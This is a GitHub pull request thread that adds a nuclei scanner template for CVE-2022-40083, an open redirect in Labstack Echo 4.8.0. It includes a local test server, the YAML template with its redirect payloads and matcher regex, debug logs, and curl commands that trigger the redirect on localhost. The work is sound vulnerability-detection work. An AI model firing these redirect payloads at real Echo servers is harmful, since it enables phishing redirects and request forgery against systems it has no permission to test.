Added CVE-2022-40083 #5606
Merged
Added CVE-2022-40083 #5606
Conversation
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
princechaddha
approved these changes
Oct 11, 2022
|
@ehsandeep After building this out and testing it I was not able to get nuclei to flag it as an issue. Although I was able to just run the curl command and get it to redirect. //main.go
package main
import (
"github.com/labstack/echo/v4"
)
func main() {
e := echo.New()
e.Static("/", "./")
e.Logger.Fatal(e.Start(":1323"))
}//go.mod
module ssrf/test
go 1.19
require github.com/labstack/echo/v4 v4.8.0
require (
github.com/labstack/echo v3.3.10+incompatible // indirect
github.com/labstack/gommon v0.3.1 // indirect
github.com/mattn/go-colorable v0.1.11 // indirect
github.com/mattn/go-isatty v0.0.14 // indirect
github.com/valyala/bytebufferpool v1.0.0 // indirect
github.com/valyala/fasttemplate v1.2.1 // indirect
golang.org/x/crypto v0.0.0-20210817164053-32db794688a5 // indirect
golang.org/x/net v0.0.0-20211015210444-4f30a5c0130f // indirect
golang.org/x/sys v0.0.0-20211103235746-7861aae1554b // indirect
golang.org/x/text v0.3.7 // indirect
)Nuclei with template only: └──╼ # echo http://127.0.0.1:1323/ | nuclei -v -t ~/nuclei-templates/cves/2022/CVE-2022-40083.yaml -debug
__ _
____ __ _______/ /__ (_)
/ __ \/ / / / ___/ / _ \/ /
/ / / / /_/ / /__/ / __/ /
/_/ /_/\__,_/\___/_/\___/_/ v2.8.8
projectdiscovery.io
[INF] Using Nuclei Engine 2.8.8 (latest)
[INF] Using Nuclei Templates 9.3.6 (latest)
[INF] Templates added in last update: 30
[INF] Templates loaded for scan: 1
[INF] Targets loaded for scan: 1
[DBG] failed to parse payload {{BaseURL}}//interactsh.com%2f.. and http://127.0.0.1:1323.skipping param merge
[INF] [CVE-2022-40083] Dumped HTTP request for http://127.0.0.1:1323//interactsh.com%2f..
GET //interactsh.com%252f.. HTTP/1.1
Host: 127.0.0.1:1323
User-Agent: Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
[WRN] [CVE-2022-40083] Could not execute request for http://127.0.0.1:1323/: GET http://127.0.0.1:1323//interactsh.com%2f.. giving up after 2 attempts: Get "http://127.0.0.1:1323//interactsh.com%252f..": failed to parse Location header "//interactsh.com%2f../": parse "//interactsh.com%2f../": invalid URL escape "%2f"
[INF] No results found. Better luck next time!Curl request: └──╼ # curl -L http://127.0.0.1:1323//interactsh.com%2f..
<!DOCTYPE html>
<html>
<body>
<body onload="window.location='https://app.interactsh.com';">
</body>
</html>Am I doing something wrong or including the wrong package? Thank you! |
|
@j1v37u2k3y there is a known bug in nuclei engine which got fixed in PR - projectdiscovery/nuclei#3243, if you try to run nuclei using the above PR, it should be working as expected. |
|
@ehsandeep Ok So I found some weird behavior with the PR that you suggested. Running two different variations produced different results based on url patterns. But the curl command work on both variations. Template usedid: CVE-2022-40083
info:
name: Labstack Echo 4.8.0 - Open Redirect
author: pdteam
severity: critical
description: |
Labstack Echo 4.8.0 contains an open redirect vulnerability via the Static Handler component. An attacker can leverage this vulnerability to cause server-side request forgery, making it possible to obtain sensitive information, modify data, and/or execute unauthorized operations.
remediation: Download and install 4.9.0, which contains a patch for this issue.
reference:
- https://github.com/labstack/echo/issues/2259
- https://nvd.nist.gov/vuln/detail/CVE-2022-40083
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
cvss-score: 9.6
cve-id: CVE-2022-40083
cwe-id: CWE-601
tags: cve,cve2022,redirect,labstack
requests:
- method: GET
path:
- "{{RootURL}}/{{redirect}}"
payloads:
redirect:
- '/interactsh.com%2F..'
- '/interactsh.com/%2F..'
stop-at-first-match: true
matchers-condition: and
matchers:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interactsh.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
- type: status
status:
- 301
- 302
- 307
- 308
condition: orresults[INF] Using Nuclei Engine 2.8.8 (latest)
[INF] Using Nuclei Templates 9.3.6 (latest)
[INF] Templates added in last update: 30
[INF] Templates loaded for scan: 1
[INF] Targets loaded for scan: 1
[INF] [CVE-2022-40083] Dumped HTTP request for http://localhost:49366//interactsh.com%2F..
GET //interactsh.com%252F.. HTTP/1.1
Host: localhost:49366
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
[INF] [CVE-2022-40083] Dumped HTTP request for http://localhost:49366//interactsh.com/%2F..
GET //interactsh.com/%252F.. HTTP/1.1
Host: localhost:49366
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
[DBG] [CVE-2022-40083] Dumped HTTP response http://localhost:49366//interactsh.com/%2F..
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Tue, 31 Jan 2023 22:30:26 GMT
Location: //interactsh.com/%2F../
Content-Length: 0
[CVE-2022-40083:regex-1] [http] [critical] http://localhost:49366//interactsh.com/%252F.. [redirect="/interactsh.com/%2F.."]
[CVE-2022-40083:status-2] [http] [critical] http://localhost:49366//interactsh.com/%252F.. [redirect="/interactsh.com/%2F.."]
[WRN] [CVE-2022-40083] Could not execute request for http://localhost:49366: GET http://localhost:49366//interactsh.com%2F.. giving up after 2 attempts: Get "http://localhost:49366//interactsh.com%252F..": failed to parse Location header "//interactsh.com%2F../": parse "//interactsh.com%2F../": invalid URL escape "%2F"curl commands with each redirect@j1v37u2k3y ➜ .../nuclei/v2/cmd/nuclei (issue-3242-make-request-fix) $ curl -L http://localhost:49366//interactsh.com%2F..
<!DOCTYPE html>
<html>
<body>
<body onload="window.location='https://app.interactsh.com';">
</body>
</html>
@j1v37u2k3y ➜ .../nuclei/v2/cmd/nuclei (issue-3242-make-request-fix) $ curl -L http://localhost:49366//interactsh.com/%2F..
<!DOCTYPE html>
<html>
<body>
<body onload="window.location='https://app.interactsh.com';">
</body>
</html>
@j1v37u2k3y ➜ .../nuclei/v2/cmd/nuclei (issue-3242-make-request-fix) $ |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Add this suggestion to a batch that can be applied as a single commit.
This suggestion is invalid because no changes were made to the code.
Suggestions cannot be applied while the pull request is closed.
Suggestions cannot be applied while viewing a subset of changes.
Only one suggestion per line can be applied in a batch.
Add this suggestion to a batch that can be applied as a single commit.
Applying suggestions on deleted lines is not supported.
You must change the existing code in this line in order to create a valid suggestion.
Outdated suggestions cannot be applied.
This suggestion has been applied or marked resolved.
Suggestions cannot be applied from pending reviews.
Suggestions cannot be applied on multi-line comments.
Suggestions cannot be applied while the pull request is queued to merge.
Suggestion cannot be applied right now. Please check back later.
Template / PR Information
Template Validation
I've validated this template locally?
Additional Details (leave it blank if not applicable)
Additional References: